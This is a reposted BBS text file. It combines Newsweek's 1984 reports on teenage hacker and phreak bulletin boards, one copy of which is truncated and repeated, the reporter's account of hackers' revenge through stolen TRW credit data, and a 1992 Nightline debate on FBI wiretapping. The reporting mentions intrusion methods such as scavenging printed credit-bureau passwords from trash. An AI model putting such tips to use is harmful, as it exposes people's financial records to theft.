and a loud explosion you are swept into . . . DRAGONFIRE . . .  Press Any 
Key....if You Dare." 
 
You have programmed your personal computer to dial into Dragonfire, a computer 
bulletin board in Gainesville,  Texas.  But before you get any information, 
Dragonfire demands your name, home city and phone number.  So,  for tonight's 
tour of the electronic wilderness you become Montana Wildhack of San Francisco.  
 
Dragonfire, Sherwood Forest, Forbidden Zone, Blottoland, Plovernet, The Vault, 
Shadowland, PHBI and scores of other computer bulletin boards are hangouts of a  
new generation of vandals. These precocious teenagers use their electronic 
skills to play hide-and-seek with computer and telephone security forces. Many 
computer bulletin boards are perfectly legitimate: they resemble electronic 
versions of the familiar cork boards in supermarkets and school corridors, 
listing services and providing information someone out there is bound to find 
useful.  But this is a walk on the wild side, a trip into the world of 
underground bulletin boards dedicated to encouraging and making mischief. The 
phone number for these boards are as closely guarded as a psychiatrist's home 
telephone number.
 
  Some numbers are posted on underground boards; others are exchanged over the 
telephone.  A friendly hacker provided Dragonfire's number.  Hook up and you see 
a broad choice of topics offered. For Phone Phreaks -- who delight in stealing 
service from AT&T and other phone networks.
 
 Phreakenstein's Lair is a potpourri of phone numbers, access codes and 
technical information.  For computer hackers -- who dial into other people's 
computers -- Ranger's Lodge is chock-full of phone numbers and passwords for 
government, university and corporate computers.  Moving through Dragonfire's 
offerings, you can only marvel at how conversant these teen-agers are with the 
technical esoterica of today's electronic age.
 
  Obviously they have spent a great deal of time studying computers,  though 
their grammar and spelling indicate they haven't been diligent in other 
subjects. You are constantly reminded of how young they are. "Well it's that 
time of year again. School is back in session so let's get those high school 
computer phone numbers rolling in. Time to get straight A's, have perfect 
attendance (except when you've been up all night hacking school passwords), and  
messing up you worst teacher's paycheck." 
 
Forbidden Zone, in Detroit, is offering ammunition for hacker civil war -- tips  
on crashing the most popular bulletin-board software.  There also are plans for
 building black, red and blue boxes to mimic operator tones and get free phone 
service. And here are the details for "the safest and best way to make and use 
nitroglycerine," compliments of Doctor Hex, who says he got it "from my 
chemistry teacher." Flip through the "pages." You have to wonder if this 
information is accurate.  Can this really be the phone number and password for 
Taco Bell's computer?  Do these kids really have the dial-up numbers for dozens  
of university computers?
 
 
The temptation is too much. You sign off and have your computer dial the number  
for the Yale computer. Bingo -- the words Yale University appear on your screen.  
You enter the password. A menu appears. You hang up in a sweat. You are now a 
hacker.
 
Punch in another number and your modem zips off the touch tones. Here comes the  
tedious side of all of this. Bulletin boards are popular. No vacancy in Bates 
Motel (named for Anthony Perkin's creepy motel in the movie "Psycho"); the line  
is busy.  So are 221 B.  Baker Street, PHBI, Shadowland and The Vault, Caesar's  
Palace rings and connects.  This is different breed of board.  Caesar's Palace 
is a combination Phreak board and computer store in Miami. This is the place to  
learn ways to mess up a department store's anti-shoplifting system, or make free 
calls on telephones with locks on the dial. Pure capitalism accompanies such 
anarchy, Caesar's Palace is offering good deals on disc drives, software, 
computers and all sorts of hardware.  Orders are placed through electronic mail  
messages.  
 
'Tele-Trial': Bored by Caesar's Palace, you enter the number for Blottoland, the 
board operated by one of the nation's most notorious computer phreaks -- King 
Blotto. This one has been busy all night, but it's now pretty late in Cleveland.  
The phone rings and you connect.  To get past the blank screen, type the 
secondary password "S-L-I-M-E." King Blotto obliges, listing his rules: he must  
have your real name, phone number, address, occupation and interests. He will 
call and disclose the primary password, "if you belong on this board." If 
admitted, do not reveal the phone number or the secondary password, lest you 
face "tele-trial," the King warns as he dismisses you by hanging up.
 
  You expected heavy security, but this teenager's security is, as they say, 
awesome. Computers at the Defense Department and hundreds of businesses let you  
know when you've reached them. Here you need a password just to find out what 
system answered the phone.
 
  Then King Blotto asks questions and hangs up.  Professional computer-security  
experts could learn something from this kid.  He knows that ever since the 414 
computer hackers were arrested in August 1982, law-enforcement officers have 
been searching for leads on computer bulletin boards. "Do you have any ties to 
or connections with any law enforcement agency or any agency which would inform  
such a law enforcement agency of this bulletin board?" 
 
Such is the welcoming message from Plovernet, a Florida board known for its 
great hacker/phreak files.  There amid a string of valid VISA and MasterCard 
numbers are dozens of computer phone numbers and passwords.  Here you also learn 
what Blotto means by tele-trial.  "As some of you may or may not know, a session 
of the conference court was held and the Wizard was found guilty of some 
miscellaneous charges, and  sentenced to four months without bulletin  boards."  
If Wizard calls, system operators like King Blotto disconnect him. Paging 
through bulletin boards is a test of your patience. Each board has different 
commands.  Few are easy to follow, leaving you to hunt and peck your way around.  
So far you haven't had the nerve to type  "C," which summons the system operator 
for a live, computer-to-computer conversation.
 
  The time, however,has  come for you to ask a few questions of the "sysop." You 
dial a computer in Boston.  It answers and you  begin working your way 
throughout the menus. You scan a handful of dial-up numbers,  including one for  
Arpanet, the Defense Department's research computer.  Bravely tap C and in 
seconds the screen blanks and your cursor dances across the screen. Hello . . .  
What kind of computer do you have? Contact. The sysop is here. You exchange 
amenities and get "talking." How much hacking does he do?  Not much, too busy. 
Is he afraid of being busted, having his computer confiscated like the Los 
Angeles man facing criminal charges because his computer bulletin board 
contained a stolen telephone credit card  number? "Hmmmm ... No," he  replies. 
Finally,  he asks the dreaded question:  "How old are you?"  "How old are YOU,"  
you reply, stalling.  "15," he types.  Once you confess and he knows you're old  
enough to be his father, the conversation gets very  serious.  You fear each new 
question;  he probably thinks you're a cop.  But all he wants to know  is your 
choice for president.  The chat continues, until he asks, "What time is it 
there?" Just past midnight, you reply. Expletive. "it's 3:08 here," Sysop types.  
"I must be going to sleep.  I've got school tomorrow."  The cursor dances 
"*********** Thank you for Calling." The screen goes blank.  
 
Epilog:
A few weeks after this reporter submitted this article to Newsweek, he found 
that his credit had been altered, his drivers' licence revoked, and EVEN HIS 
Social Security records changed! Just in case you all might like to construe 
this as a 'Victimless' crime.  The next time a computer fouls up your billing on 
some matter, and COSTS YOU, think about it!  
                        
 
 
 
This is the follow-up to the previous article concerning the Newsweek reporter.  
It spells out SOME of the REAL dangers to ALL of us, due to this type of 
activity!  
 
 
 
         
 
The REVENGE of the Hackers
                        
 
 
In the mischievous fraternity of computer hackers, few things are prized more 
than the veil of secrecy. As NEWSWEEK San Francisco correspondent Richard Sandza 
found out after writing a story on the electronic underground's (DISPATCHES, 
Nov.  12, 198\ ability to exact revenge can be unnerving. Also severe.... 
 Sandza's report:
 
"Conference!" someone yelled as I put the phone to my ear. Then came a 
mind-piercing "beep," and suddenly my kitchen seemed full of hyperactive 
15-year-olds.  "You the guy who wrote the article in NEWSWEEK?" someone shouted  
from the depths of static, and giggles. "We're going disconnect your phone," one 
shrieked.  "We're going to blow up your house," called another. I hung up. Some  
irate readers write letters to the editor. A few call their lawyers. Hackers, 
however, use the computer and the telephone, and for more than simple comment. 
Within days, computer "bulletin boards" around the country were lit up with 
attacks on NEWSWEEK's "Montana Wildhack" (a name I took from a Kurt Vonnegut 
character), questioning  everything from my manhood to my prose style.  "Until 
we get real good revenge," said one message from Unknown Warrior, "I would like  
to suggest that everyone with an auto-l modem call Montana Butthack then hang up 
when he  answers."  Since then the hackers of America have called my home at 
least 2000 times.  My harshest critics communicate on Dragonfire, a Gainesville, 
Texas, bulletin board where I am on teletrial, a video-lynching in which a 
computer user with grievance dials the board and presses charges against the 
offending party.  Other hackers --  including the defendant --post concurrences  
or rebuttals. Despite the mealtime interruptions, all this was at most a minor 
nuisance; some was amusing, even fun.
 
  FRAUD: The fun stopped with a call from a man who identified himself only as 
Joe.  "I'm calling to warn you," he said.  When I barked back, he said, "Wait, 
I'm on your side.  Someone has broken into TRW and obtained a list of all your 
credit-card numbers, your home address, social-security number and wife's name 
and is posting it on bulletin boards around the country." He named the charge 
cards in my wallet.  
 
Credit-card numbers are a very hot commodity among some hackers.  To get one 
from a computer system and post it is the hacker equivalent of making the team.  
After hearing from Joe I visited the local office of the TRW credit bureau and 
got a copy of my credit record.  Sure enough, it showed a Nov.  13 inquiry by 
the Lenox (Mass.) Savings Bank, an institution with no reason whatever to ask 
about me.  Clearly some hacker had used Lenox's password to the TRW computers to 
get to my files (the bank has since changed the password). It wasn't long before 
I found out what was being done with my credit-card numbers, thanks to another 
friendly hacker who tipped me to Pirate 80, a bulletin board in Charleston, 
W.Va., where I found this:  "I'm  sure you guys have heard about Richard Stza or 
Montana Wildhack.  He's the guy who G

       The Night of the Hackers


As you are surveying the dark and
misty swamp you come across what
appears to be a small cave.  You light
a torch and enter.  You have walked
several hundred feet when you stumble
into a bright blue portal.  .  .  With
a sudden burst of light and a loud
explosion you are swept into .  .  .
DRAGONFIRE .  .  .  Press Any Key if
You Dare."

You have programmed your personal
computer to dial into Dragonfire, a
computer bulletin board in
Gainesville, Texas.  But before you
get any information, Dragonfire
demands your name, home city and phone
number.  So, for tonight's tour of the
electronic wilderness you become
Montana Wildhack of San Francisco.

Dragonfire, Sherwood Forest (sic),
Forbidden Zone, Blottoland, Plovernet,
The Vault, Shadowland, PHBI and scores
of other computer bulletin boards are
hangouts of a new generation of
vandals.  These precocious teenagers
use their electronic skills to play
hide-and-seek with computer and
telephone security forces.  Many
computer bulletin boards are perfectly
legitimate:  they resemble electronic
versions of the familiar cork boards
in supermarkets and school corridors,
listing services and providing
information someone out there is bound
to find useful.  But this is a walk on
the wild side, a trip into the world
of underground bulletin boards
dedicated to encouraging -- and making
-- mischief.

The phone number for these boards are
as closely guarded as a psychiatrist's
home telephone number.  Some numbers
are posted on underground boards;
others are exchanged over the
telephone.  A friendly hacker provided
Dragonfire's number.  Hook up and you
see a broad choice of topics offered.
For Phone Phreaks -- who delight in
stealing service from AT&T and other
phone networks .  Phreakenstein's Lair
is a potpourri of phone numbers,
access codes and technical
information.  For computer hackers --
who dial into other people's computers
-- Ranger's Lodge is chock-full of
phone numbers and passwords for
government, university and corporate
computers.  Moving through
Dragonfire's offerings, you can only
marvel at how conversant these
teen-agers are with the technical
esoterica of today's electronic age.
Obviously they have spent a great deal
of time studying computers, though
their grammar and spelling indicate
they haven't been diligent in other
subjects.  You are constantly reminded
of how young they are.

"Well it's that time of year again.
School is back in session so let's get
those high school computer phone
numbers rolling in.  Time to get
straight A's, have perfect attendance
(except when you've been up all night
hacking school passwords), and messing
up you worst teacher's paycheck."

Forbidden Zone, in Detroit, is
offering ammunition for hacker civil
war -- tips on crashing the most
popular bulletin-board software.
There also are plans for building
black, red and blue boxes to mimic
operator tones and get free phone
service.  And here are the details for
"the safest and best way to make and
use nitroglycerine," compliments of
Doctor Hex, who says he got it "from
my chemistry teacher."

Flip through the "pages." You have to
wonder if this information is
accurate.  Can this really be the
phone number and password for Taco
Bell's computer?  Do these kids really
have the dial-up numbers for dozens of
university computers?  The temptation
is too much.  You sign off and have
your computer dial the number for the
Yale computer.  Bingo -- the words
Yale University appear on your screen.
You enter the password.  A menu
appears.  You hang up in a sweat.  You
are now a hacker.

Punch in another number and your modem
zips off the touch tones.  Here comes
the tedious side of all of this.
Bulletin boards are popular.  No
vacancy in Bates Motel (named for
Anthony Perkin's creepy motel in the
movie "Psycho"); the line is busy.  So
are 221 B.  Baker Street, PHBI,
Shadowland and The Vault, Caesar's
Palace rings and connects.  This is
different breed of board.  Caesar's
Palace is a combination Phreak board
and computer store in Miami.  This is
the place to learn ways to mess up a
department store's anti-shoplifting
system, or make free calls on
telephones with locks on the dial.
Pure capitalism accompanies such
anarchy, Caesar's Palace is offering
good deals on disc drives, software,
computers and all sorts of hardware.
Orders are placed through electronic
mail messages.

'Tele-Trial':  Bored by Caesar's
Palace, you enter the number for
Blottoland, the board operated by one
of the nation's most notorious
computer phreaks -- King Blotto.  This
one has been busy all night, but it's
now pretty late in Cleveland.  The
phone rings and you connect.  To get
past the blank screen, type the
secondary password "S-L-I-M-E." King
Blotto obliges, listing his rules:  he
must have your real name, phone
number, address, occupation and
interests.  He will call and disclose
the primary password, "if you belong
on this board." If admitted, do not
reveal the phone number or the
secondary password, lest you face
"tele-trial," the King warns as he
dismisses you by hanging up.  You
expected heavy security, but this
teenager's security is, as they say,
awesome.  Computers at the Defense
Department and hundreds of businesses
let you know when you've reached them.
Here you need a password just to find
out what system answered the phone.
Then King Blotto asks questions -- and
hangs up. Professional
computer-security experts could learn
something from this kid. He knows that
ever since the 414 computer hackers
were arrested in August 1982,
law-enforcement officers have been
searching for leads on computer
bulletin boards.

"Do you have any ties to or
connections with any law enforcement
agency or any agency which would
inform such a law enforcement agency
of this bulletin board?"

Such is the welcoming message from
Plovernet, a Florida board known for
its great hacker/phreak files.  There
amid a string of valid VISA and
MasterCard numbers are dozens of
computer phone numbers and passwords.
Here you also learn what Blotto means
by tele-trial.  "As some of you may or
may not know, a session of the
conference court was held and the
Wizard was found guilty of some
miscellaneous charges, and sentenced
to four months without bulletin
boards." If Wizard calls, system
operators like King Blotto disconnect
him.  Paging through bulletin boards
is a test of your patience.  Each
board has different commands.  Few are
easy to follow, leaving you to hunt
and peck your way around.  So far you
haven't had the nerve to type "C,"
which summons the system operator for
a live, computer-to-computer
conversation.  The time, however has
come for you to ask a few questions of
the "sysop." You dial a computer in
Boston. It answers and you begin
working your way throughout the menus.
You scan a handful of dial- up
numbers, including one for Arpanet,
the Defense Department's research
computer.  Bravely tap C and in
seconds the screen blanks and your
cursor dances across the screen.

Hello .  .  .  What kind of computer
do you have?

Contact.  The sysop is here.  You
exchange amenities and get "talking."
How much hacking does he do?  Not
much, too busy.  Is he afraid of being
busted, having his computer
confiscated like the Los Angeles man
facing criminal changes because his
computer bulletin board contained a
stolen telephone-credit-card number?
"Hmmmm .  .  .  No," he replies.
Finally, he asks the dreaded question:
"How old are you?" "How old are YOU,"
you reply, stalling.  "15," he types.
Once you confess and he knows you're
old enough to be his father, the
conversation gets very serious.  You
fear each new question; he probably
thinks you're a cop.  But all he wants
to know is your choice for president.
The chat continues, until he asks,
"What time is it there?" Just past
midnight, you reply.  Expletive.
"it's 3:08 here," Sysop types.  "I
must be going to sleep.  I've got
school tomorrow." The cursor dances
"*********** Thank you for Calling."
The screen goes blank.


Epilog:

A few weeks after this reporter
submitted this article to Newsweek, he
found that his credit had been
altered, his drivers' licence revoked,
and EVEN HIS Social Security records
changed!  Just in case you all might
like to construe this as a
'Victimless' crime.  The next time a
computer fouls up your billing on some
matter, and COSTS YOU, think about it!


-----------------------------------

This the follow-up to the previous
article concerning the Newsweek
reporter.  It spells out SOME of the
REAL dangers to ALL of us, due to this
type of activity!



      The REVENGE of the Hackers


In the mischievous fraternity of
computer hackers, few things are
prized more than the veil of secrecy.
As NEWSWEEK San Francisco
correspondent Richard Sandza found out
after writing a story on the
electronic underground's (DISPATCHES,
Nov.  12, 198 ability to exact
revenge can be unnerving.  Also
severe....  Sandza's report:

"Conference!" someone yelled as I put
the phone to my ear.  Then came a
mind-piercing "beep," and suddenly my
kitchen seemed full of hyperactive
15-year-olds.  "You the guy who wrote
the article in NEWSWEEK?" someone
shouted from the depths of static, and
giggles.  "We're going disconnect your
phone," one shrieked.  "We're going to
blow up your house," called another.
I hung up.

Some irate readers write letters to
the editor.  A few call their lawyers.
Hackers, however, use the computer and
the telephone, and for more than
simple comment.  Within days, computer
"bulletin boards" around the country
were lit up with attacks on NEWSWEEK's
"Montana Wildhack" (a name I took from
a Kurt Vonnegut character),
questioning everything from my manhood
to my prose style.  "Until we get real
good revenge," said one message from
Unknown Warrior, "I would like to
suggest that everyone with an
auto-dial modem call Montana Butthack
then hang up when he answers." Since
then the hackers of America have
called my home at least 2000 times.
My harshest critics communicate on
Dragonfire, a Gainesville, Texas,
bulletin board where I am on
teletrial, a video-lynching in which a
computer user with grievance dials the
board and presses charges against the
offending party. Other hackers --
including the defendant --post
concurrences or rebuttals. Despite the
mealtime interruptions, all this was
at most a minor nuisance; some was
amusing, even fun.

FRAUD:  The fun stopped with a call
from a man who identified himself only
as Joe.  "I'm calling to warn you," he
said.  When I barked back, he said,
"Wait, I'm on your side.  Someone has
broken into TRW and obtained a list of
all your credit-card numbers, your
home address, social-security number
and wife's name and is posting it on
bulletin boards around the country."
He named the charge cards in my
wallet.

Credit-card numbers are a very hot
commodity among some hackers.  To get
one from a computer system and post it
is the hacker equivalent of making the
team.  After hearing from Joe I
visited the local office of the TRW
credit bureau and got a copy of my
credit record.  Sure enough, it showed
a Nov.  13 inquiry by the Lenox
(Mass.) Savings Bank, an institution
with no reason whatever to ask about
me.  Clearly some hacker had used
Lenox's password to the TRW computers
to get to my files (the bank has since
changed the password).

It wasn't long before I found out what
was being done with my credit-card
numbers, thanks to another friendly
hacker who tipped me to Pirate 80, a
bulletin board in Charleston, W.Va.,
where I found this:  "I'm sure you
guys have heard about Richard Stza or
Montana Wildhack.  He's the guy who
wrote the obscene story about
phreaking in NewsWeek.  Well, my
friend did a credit card check on TRW
.  .  .  try this number, it' a VISA .
.  . Please nail this guy bad .  .  .
Captain Quieg.

Captain Quieg may himself be nailed.
He has violated the Credit Card Fraud
Act of 1984 signed by President Reagan
on Oct.  12.  The law provides a
$10,000 fine and up to a 15-year
prison term for "trafficking" in
illegally obtained credit-card account
numbers.  His "friend" has committed a
felony violation of the California
computer-crime law.  TRW spokeswoman
Delia Fernandex said that TRW would
"be more than happy to prosecute" both
of them.

TRW has good reason for concern.  Its
computers contain the credit histories
of 120 million people.  Last year TRW
sold 50 million credit reports on
their customers.  But these highly
confidential personal records are so
poorly guarded that computerized
teenagers can ransack the files and
depart undetected.  TRW passwords --
unlike many others -- often print out
when entered by TRW's customers.
Hackers then look for discarded
printouts.  A good source:  the trash
of banks and automobile dealerships,
which routinely do credit checks.
"Everybody hacks TRW," says Cleveland
hacker King Blotto, whose bulletin
board has security system the Pentagon
would envy.  "It's the easiest." For
her part, Fernandez insists that TRW
"does everything it can to keep the
system secure

In my case, however, that was not
enough.  My credit limits would hardly
support big-time fraud, but
victimization takes many forms.
Another hacker said it was likely that
merchandise would be ordered in my
name and shipped to me -- just to
harass me.  I used to use credit-card
numbers against someone I didn't
like," the hacker said.  "I'd call
Sears and have a dozen toilets shipped
to his house."

Meanwhile, back on Dragonfire, my
teletrial was going strong.  The
charges, as pressed my Unknown
Warrior, include "endangering all
phreaks and hacks." The judge in this
case is a hacker with the apt name of
Ax Murderer. Possible sentences range
from exile from the entire planet" to
"kill the dude." King Blotto has taken
up my defense, using hacker power to
make his first pleading:  he dialed up
Dragonfire, broke into its operating
system and "crashed" the bulletin
board, destroying all of its messages
naming me. The board is back up now,
with a retrial in full swing.  But
then, exile from the electronic
underground looks better all the time.


+-------------------------------------
+ END of COLOSSUS NEWSLETTER Issue 3,
Volume 1. Please upload to MANY
boards!
+-------------------------------------
+

(Chuck: Whew!) (Ed: My fingers cramped
again!)


    NIGHTLINE: FBI, PRIVACY, AND PROPOSED WIRE-TAPPING LEGISLATION
                        (Friday, May 22, 1992)

Main Participants:
   Ted Koppel (TK - Moderator)
   Marc Rotenberg (MR - Computer Professionals for Social Responsibility)
   William Sessions (WS - Director, FBI)

TK: In these days of encroaching technology, when every transaction,
from the purchase of a tie to the withdrawal of twenty dollars from a
cash machine, is a matter of record, it may be surprising to learn
that technology has given us some added privacy. To find this new
boon, look at your telephone. It used to be fair game for wiretapping.
Done legally, that requires a court order. But that was the hard part.
For the price of a few pieces of wires and clips, human voices were
there for the eavesdropping. That's changing now. The advent of phiber
optics, of digital communication and encryption devices all mean that
what we say, what we transmit over the telephone lines, can't easily
be spied upon. Even if you could single out the one phone call among
thousands passing in a phiber optic cable, what you would hear would
be a hiss. Voices being transmitted in computer code.  That's good
news for businesses, who fear industrial spies, and it's welcomed by
telephone users anywhere, who want to think that what they say into a
receiver is protected. But, it's bad news for those whose business it
is sometimes to eavesdrop. That includes law enforcement. As Dave
Marek reports, it's getting tougher to reach out and wiretap someone.

DM: The explosion of new communications technology, e-mail upstaging
airmail, fax machines pushing prose into offices, homes, and even
automobiles, celluar phones that keep us in touch from anywhere to
everywhere, has created a confusing competition of services and
counter-services.

(Unseen female voice answering telephone): Who is this please.

(Heavy breathing unseen male caller): Why don't you guess?

DM: Take that new telephone service called "caller ID." Already most
phone companies now offer a counter-service which blocks caller ID.
This is bad news if you're fighting off creep callers. But it's good
news if you want to block some 900 number service from capturing your
number on their caller ID screen, and the selling it off to some
direct marketing outfit. But today's biggest communications
controversy is about interception services. Tapping telephones used to
be so simple.

(Film clips from commercial for adult 900 number and film clips of
wiretapping from film "Three Days of the Condor") with reporter's
voice-over.

A snooper needed only a couple of alligator clips and a set of
earphones to hear what was being said. Today's telephones digitalize
chatter into computer code. Bundle all those infinitesimal ones and
zeros into flashes of light and don't reconstruct them into sound
again until just before the call reaches your ear. This has made phone
tapping much tougher.  But still, according to Bell Atlantic executive
Ken Pitt (??): There's never yet been an FBI surveillance request a
phone company couldn't handle.

KP: We have been able to satisfy every single request that they've
made, not only here at Bell Atlantic, but all across the country.

DM: Still, when the FBI looks into the future, it sees trouble.  It
sees criminals like John Gotti becoming able to shield their
incriminating conversations from surveillance and thereby becoming
able to defeat law enforcements best evidence.

Clifford Fishman:: When you're going after organized crime, and the
Gotti case is a perfect example, the traditional techniques, visual
surveillance, the paper trail, trying to turn the people who are on
the inside, trying to infiltrate someone into the, uh, organization,
they all have built-in difficulties. Witnesses can be killed, they can
be bribed, they can be threatened. Ah, the most effective evidence
quite often that a prosecutor can have, the only evidence that can't
be discredited, that can't be frightened off, are tape recordings of
the suspects talking to each other, discussing their crimes together,
planning their crimes together, committing their crimes together.

DM: As FBI Director William Sessions told a Congressional Hearing late
last month:

WS: The technology must allow us access, and it must allow us to stay
even with what we now have. Else, we are denied the ability to carry
out the responsibility which the Congress of the United States has
given us.

KP: One of the solutions they've asked for is the simple software
solution.

DM: This would involve not tapping into individual phone lines, but
planting decoding software into:

KP: ....The central offices where the telephone switching's done,
where the wires are connected to ((bad audio cut)) ...the computers,
and someone, the FBI is saying, "Let's do the switching, let's do the
wiretaps with the software."

DM: This software solution is already in use. But communications
expert Marc Rotenberg says it could lead to future abuses of privacy
by creating a surveillance capability:

Marc Rotenburg: ...which would allow the agent from a remote keyboard,
not in the phone system, not at the target's location, to punch in a
phone number and begin recording the contents of the communication.
That also's never been done in this country before. It's not too
different from what the STAZI (??) attempted to do in East Germany.
But the ((one word garbled)) for abuse there would be very hard.

DM: Protecting the privacy of ordinary conversation isn't the only
issue at stake here.

Janlori Goldman (ACLU): The privacy rights of ordinary citizens will
be put at risk if the FBI's proposal goes forward. Right now, all
kinds of very sensitive information is flowing through the
telecommunications network. A lot of routine banking transactions,
people are sending information over computer lines.  ((One word
garbled)) will be communicating more over the network. And what is
happening is that as the private sector is trying to make systems less
vulnerable, to make them more secure, to develop encryption so that
these people don't have to worry about sending information through, if
the FBI's proposal goes forward, those systems will be at great risk.

DM: Encryption, or putting communications into unbreakable code,
frightens the FBI and the super-secret National Security Agency, which
monitors communications of all kinds all around the globe.  Like the
FBI, the NSA wants total access.  And to assure it, the NSA wants to
limit all American companies to a communications' code system it can
break. Some people call that "turning back the clock."

JG: What we're seeing is an FBI effort to require US industries to
basically reverse progress, and there's no way that international
companies will be following the U.S. trends in this area. If anything,
they will surpass us, they will go beyond us, and we will be out of
competiveness in the information market.

DM: The competition to control and surveil communications spreads
across all the boarders on the planet and squeezes inside the flickers
that activate a computer's brain. But what makes both the big picture
and the little one so hard to focus is that the rules of the
surveillance game are always changing.  Every time, a new
technological explosion makes new ways of snooping possible.  I'm Dave
Marek for Nightline in Washington.

TK: When we come back, we'll be joined by the Director of the FBI,
William Sessions, and by an expert in privacy law, Marc Rotenburg.

                            ((COMMERCIAL))

TK: As Director of the FBI, William Sessions is the point man in the
lobbying effort to adjust new technologies so that his agency can
continue to use telephone wiretaps.  Judge Sessions joins us in our
Washington studios.  Also joining us in Washington is Marc Rotenburg,
the Director of the Washington Office of Computer Professionals for
Social Responsibility.  Mr. Rotenburg, who teaches privacy law at
Georgetown University, says that the FBI proposal would invite use of
wiretaps.

Judge Sessions, I'd like to begin on a more fundamental point.  As you
understand better than most, the very underpinning of our system of
jurisprudence is that it's better to let a hundred guilty men go free
than to wrongfully convict one innocent man, so why should the privacy
of millions of innocents be in anyway jeopardized by your need to have
access to our telephone system?

WS: Ted, I think that that question has been fundamentally answered by
the Congress back in 1968 with the Organized Crime Control and Safe
Streets Act, when it decided that it's absolutely essential for law
enforcement to have court ordered and court authorized access to ((two
words garbled)) privacy information normally private conversations, if
they involve criminal conduct.  And the point is that unless you have
that access to criminal conversations, you cannot deal with it in a
law enforcement technique or a law enforcement method.  Therefore,
it's essential that you have the ability to tap into those
conversations.  So, privacy of that kind is not an issue.  Criminality
is.

TK: Although, what is currently the case, is that you would be
required on a case-by-case basis, to get a judge to give you
permission to do that.

WS: That is absolutely correct. The United States District Judge, who
is the person authorized to actually give that consent, must be
convinced that it is absolutely necessary, and that the technique will
be properly used under the law.

TK: If you have, therefore, the centralized capacity to do that, let's
say from FBI headquarters, doesn't that invite abuse?

WS: There has been no suggestion that that would ever be contemplated
under any system. There are necessities of tapping phones that, in
connection with various criminal cases around the country, have many
different jurisdictions, from the east to the west.  The point is that
a court would authorize the FBI, or other law enforcement agencies, to
have that access.

TK:  All right. Mr. Rotenburg, what then is the problem? What then is
different from the modality that the FBI uses these days?

MR: Well,  Mr. Koppel, I think the critical point, that the 1968 law
which Judge Sessions referred to, set down very strict procedures for
the conduct of wire surveillance. And the methods that come from
reading that history, the Congress was very much concerned about this
type of investigative method. They described it as an investigative
method of last resort. And it's for that reason that the wire
surveillance statute creates so many requirements. Now, the FBI has
put forward a proposal that would permit them to engage in a type of
remote surveillance, in other words, to permit an agent, with a
warrant, to presumably type in the telephone number to begin to record
a telephone conversation.  That capability has not previously existed
in the United States, and I think that's the reason the proposal is so
troubling.

TK: But, if this happens, still, under control of the judge, the
technical means of doing it may be somewhat changing, but as long as
the legality has not been changed, and the means by which the FBI gets
permission to do this kind of thing, why should that trouble us in
anyway?

MR: Well, the two are closely related.  Communications privacy is very
much about network security.  It's about sealed pipes, and showing
that information can move through the network and not be intercepted
unlawfully by anyone who shouldn't have access to it. When you talk
about designing the network to facilitate wire surveillance, in a
sense to replace walls with doors that can be opened, you create new
opportunities for abuse, and I see this as a problem.

TK: Judge Sessions, again, there is the argument that is made, and I
guess Mr. Rotenburg is one of the most eloquent proponents of this
argument, that the FBI doesn't want this particular breakthrough in
technology, that the FBI is taking a sort of Luddite philosophy here,
and saying if indeed communications can be so safeguarded against
intrusion, well that's just too darn bad.

WS: Well, of course, as you noted, it is absolutely essential, the
essential ingredient is that there be a court authorization to kick
out that particular conversation that is authorized to be overheard,
authorized to be intercepted.  And, so, the spectre that Mr. Rotenburg
raises does not exist in any shape or form in what we're proposing.
All we are proposing is that with the digital telephony capability,
that we be able to maintain the same capability that we've always had
under the Organized Crime Control and Safe Streets Act. That is, to
have access to that particular digital bit, or that particular
conversation, always under a court authorization with (two words
garbled).  And as Mr. Rotenburg noted, very, very meticulously and
carefully followed by the courts with an insistence upon total
compliance with the law. That's all we seek. That is, to stay even and
to be able to have that necessary access under the law.

TK: Has the FBI, in the past, Mr. Rotenburg, ever requested any kind
of technological assistance? I mean, they've always had to go to the
telephone company anyway, and say, "Help us get in."

MR: Well, yes. And that's appropriate to an extent. The FBI, when
they're in possession of a lawful warrant, I think, can expect
assistance in execution of the warrant.  The difference in the FBI
proposal that's now before the Congress is that the communications
service providers are going to need to design their systems with wire
surveillance in mind. And that's not been previously done. The
Congress of 1968 that Judge Sessions referred to purposely created an
"arms-length" relationship between the Bureau and the telephone
companies, and I don't think they wanted a situation to develop where
this system was being designed to facilitate wiretapping.

TK:  All right. We have to take a break, gentlemen, but when we come
back, let's discuss where it is in Congress right now, and where it is
likely to go next.  We'll continue our discussion in a moment.

                            ((COMMERCIAL))

TK: And we're back once again with Marc Rotenburg and FBI Director
William Sessions. Judge Sessions, what is it you're asking Congress?

WS: What we want to be able to do is to maintain our capabilities to
actually access the digital bitstream that is in the digital telephony
capability. We're asking the Congress to give us a mechanism whereby
we can actually do that. I believe it will now be proposed that rather
than being through the Federal Communications System, it will be
actually through the Department of Justice, that it will, in fact,
allow that oversight to ensure that those companies that do in fact,
under that guidance, prepare us the capability, or give us the
capability, to access that digital stream in the digital telephonic
process.

TK: Which you could access independently, without turning to the
telephone company.

WS: We would be able to do it under a court order, and always under a
court order.....

TK: ...I understand that. I'm just talking about, technologically
speaking, you would have the capacity to access it on your own without
assistance from the telephone company.

WS: I would think that that would not be so, Mr. Koppel, because what
will happen is that it would be, normally the court would order the
telephone company to provide the access.

TK: Again, Mr. Rotenburg, I don't quite understand what the difference
is. If the telephone company has the capacity to do that, then even
though...under the current law, presumably, the FBI would be able to
go to the telephone company if it has the right court order in hand
and say, "Give us access."

MR: The difference, Mr. Koppel, is that currently agents either go to
the site where the target is and conduct a physical wiretap or they go
to the central exchange office of the telephone company and conduct a
tap there. There are other ways to do it as well, but for the most
part it involves physical access to the networks.  The new proposal
speaks specifically about designing a remote surveillance or
monitoring capability. Now, that's a change.

WS: That's because of the nature of the technology. The technology now
allows us simply to do exactly what he says....

MR: ....But that's not maintaining the status quo. That is a new
capability that you would get if the proposal goes forward.

TK: Why should I, as an individual consumer of telephone, fax,
whatever the technology may be, why should I be concerned about that,
Mr. Rotenburg?

MR: As I've said before, I think that this is the type of proposal
that's likely to invite abuse. It makes the network less secure.  And
the other aspect of the proposal, which has also raised concerns, is
that it give the Department of Justice new authority to set standards
for communications of all kinds in this country.

TK: May I turn it around for a moment? If I may, I think that what
you're suggesting is not that it makes it less secure, but that the
new technology makes it more secure than it has been in the past, and
the FBI wants to stay even. Would you argue with that?

MR: It may make it more secure in the future.  It's not clear what the
outcome will be, frankly, if you go forward with these changes that
the Bureau has proposed.

WS: What I think you must remember is that when you're talking about
illegal access, you're talking about illegal conduct. That is, conduct
for which a crime can be charged. Therefore, if you had illegal
conduct anywhere, now or then, illegal use of the system, improper use
of the system, that is the basis of a criminal charge.

